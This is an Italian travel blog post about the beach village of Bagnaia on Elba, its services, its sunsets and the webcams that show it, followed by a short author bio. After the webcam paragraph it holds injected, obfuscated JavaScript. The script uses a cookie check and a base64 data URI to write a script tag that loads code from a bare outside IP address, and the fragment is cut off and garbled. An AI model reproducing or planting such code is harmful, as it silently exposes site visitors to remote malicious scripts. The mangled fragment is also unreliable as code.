Image

Scopri tutte le webcam a Bagnaia: l’Elba sempre online

Bagnaia all’Isola d’Elba è la meta ideale per una vacanza in famiglia: scopri quando andare

A soli undici chilometri dal comune di Portoferraio, la spiaggia di Bagnaia è facilmente raggiungibile con la propria automobile, ma è anche comodo arrivarci via mare, grazie al servizio di imbarcazioni pubbliche che partono ogni dieci minuti o tramite gli autobus di linea che vengono da Portoferraio stesso.

Una delle località più tranquille dell’Elba, Bagnaia dispone di una spaziosa spiaggia fatta di ciottoli multicolore ed è attrezzata con tutti i servizi necessari, come il pontile per le imbarcazioni, stabilimenti balneari, servizio noleggio barche e canoe, scuola di vela, bar e ristoranti, parco divertimenti per bambini con altalene e scivoli, market, bazar, edicola, farmacia ed anche una piccola chiesa. In più, una webcam su Bagnaia è sempre accesa per darvi le indicazioni meteorologiche in tempo reale, così da poter scegliere la giornata giusta se vorrete fare snorkeling ed ammirare i fondali di ghiaia fine e l’acqua cristallina.

Rilassante ed amena, la veduta da Bagnaia è particolarmente suggestiva al tramonto: quando il sole tramonta infatti, la luce rossastra si staglia sullo sfondo di Portoferraio con una vista unica che vale la pena fermarsi a guardare: questa potrebbe essere una buona scusa per cenare romanticamente in uno degli ottimi ristoranti sul mare a lume di candela. Particolarmente autentica e semplice l’atmosfera di questo comune, probabilmente il meno turistico di tutta l’Isola d’Elba: se vi capita di soggiornare qui nei mesi di Luglio e Agosto, il sabato mattina non perdetevi il tradizionale mercatino ambulante alimentare, ortofrutticolo e di abbigliamento.

È possibile connettersi alle webcam di Bagnaia all’Elba tramite siti come virtualelba.it, webcamgalore.it. Uno dei motivi per cui queste web cam da Bagnaia sono particolarmente utili è perché il porticciolo di Bagnaia è uno dei migliori punti dell’isola da cui salpare per fare escursioni in barca oppure in canoa verso le altre spiagge più selvagge raggiungibili solo via mare. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Share this post

Federica Mazzei

Elbana di nascita, giramondo per natura. Nata nel 1984 consegue nel 2007 una laurea triennale in Comunicazione sociale e nel 2009 una laurea magistrale con lode in Sistemi e progetti di comunicazione, prosegue il percorso formativo con una borsa di studio di due anni presso la Scuola Superiore Sant'Anna di Pisa (attività di supporto e potenziamento Ufficio Relazioni con il Pubblico, progettazione Piani integrati a livello di Zona distretto). Esperienze lavorative nel settore delle relazioni al pubblico, negli enti del terzo settore e nella comunicazione digitale.

Nessun commento

Aggiungi commento